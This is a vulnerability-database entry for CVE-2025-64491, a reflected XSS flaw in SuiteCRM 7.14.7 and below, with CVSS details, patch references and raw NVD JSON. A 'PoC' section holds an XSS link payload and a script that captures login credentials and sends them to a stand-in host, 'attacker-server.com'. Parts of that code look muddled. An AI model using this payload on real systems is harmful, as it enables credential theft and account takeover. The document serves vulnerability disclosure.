Security Vulnerability Report
CVE-2025-64491 CVSS 6.1 MEDIUM

Published: 2025-11-08 01:15:39
Last Modified: 2025-11-25 17:33:02

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions 7.14.7 and below allow unauthenticated reflected Cross-Site Scripting (XSS). Successful exploitation could lead to full account takeover, for example by altering the login form to send credentials to an attacker-controlled server. As a reflected XSS issue, exploitation requires the victim to open a crafted malicious link, which can be delivered via phishing, social media, or other communication channels. This issue is fixed in version 7.14.8.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM < 7.14.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-64491 SuiteCRM Reflected XSS PoC -->
<!-- Target: SuiteCRM <= 7.14.7 -->
<!-- This PoC demonstrates how an attacker can steal credentials via reflected XSS -->
<!DOCTYPE html>
<html>
<head>
<title>CVE-2025-64491 PoC</title>
</head>
<body>
<h2>SuiteCRM Reflected XSS PoC - CVE-2025-64491</h2>
<p>Click the link below to see the XSS payload in action:</p>
<!-- Replace TARGET_URL with the actual SuiteCRM URL -->
<!-- Example XSS payload in URL parameter -->
<a href="http://TARGET_URL/index.php?module=Users&action=Login&return_action=index&error=1&msg=<script>alert('XSS CVE-2025-64491')</script>" target="_blank">Malicious Link</a>
<!-- Credential Stealing Payload -->
<!-- This payload modifies the login form to send credentials to attacker server -->
<script>
// Payload to steal credentials
var xssPayload = `
<script>
document.getElementById('login_button').onclick = function() {
  var username = document.getElementById('user_name').value;
  var password = document.getElementById('user_password').value;
  var redirectUrl = 'http://attacker-server.com/steal?u=' + encodeURIComponent(username) + '&p=' + encodeURIComponent(password);
  window.location.href = redirectUrl;
  return false;
};
<\/script>
`;
// Inject the payload into the page
document.write(xssPayload);
</script>
<p><strong>Attack Scenario:</strong></p>
<ol>
<li>Attacker creates a malicious URL with XSS payload</li>
<li>Victim clicks the link (via phishing, social media, etc.)</li>
<li>Malicious JavaScript executes in victim's browser</li>
<li>Login credentials are sent to attacker-controlled server</li>
<li>Attacker hijacks the victim's account</li>
</ol>
</body>
</html>

References

https://github.com/SuiteCRM/SuiteCRM/commit/40da2845a170832a4e9e9fa0ebe731f8c34de42d (Patch)
https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-prfm-6667-x3mv (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64491", "sourceIdentifier": "[email protected]", "published": "2025-11-08T01:15:39.000", "lastModified": "2025-11-25T17:33:02.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions 7.14.7 and below allow unauthenticated reflected Cross-Site Scripting (XSS). Successful exploitation could lead to full account takeover, for example by altering the login form to send credentials to an attacker-controlled server. As a reflected XSS issue, exploitation requires the victim to open a crafted malicious link, which can be delivered via phishing, social media, or other communication channels. This issue is fixed in version 7.14.8."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto y lista para empresas. Las versiones 7.14.7 e inferiores permiten cross-site scripting (XSS) reflejado no autenticado. La explotación exitosa podría llevar a una toma de control total de la cuenta, por ejemplo, alterando el formulario de inicio de sesión para enviar credenciales a un servidor controlado por un atacante. Como un problema de XSS reflejado, la explotación requiere que la víctima abra un enlace malicioso diseñado, que puede ser entregado a través de phishing, redes sociales u otros canales de comunicación. Este problema está solucionado en la versión 7.14.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.14.8", "matchCriteriaId": "37968BEF-2577-4B8F-AE06-8C9DCEB9C84B"}]}]}], "references": [{"url": "https://github.com/SuiteCRM/SuiteCRM/commit/40da2845a170832a4e9e9fa0ebe731f8c34de42d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-prfm-6667-x3mv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}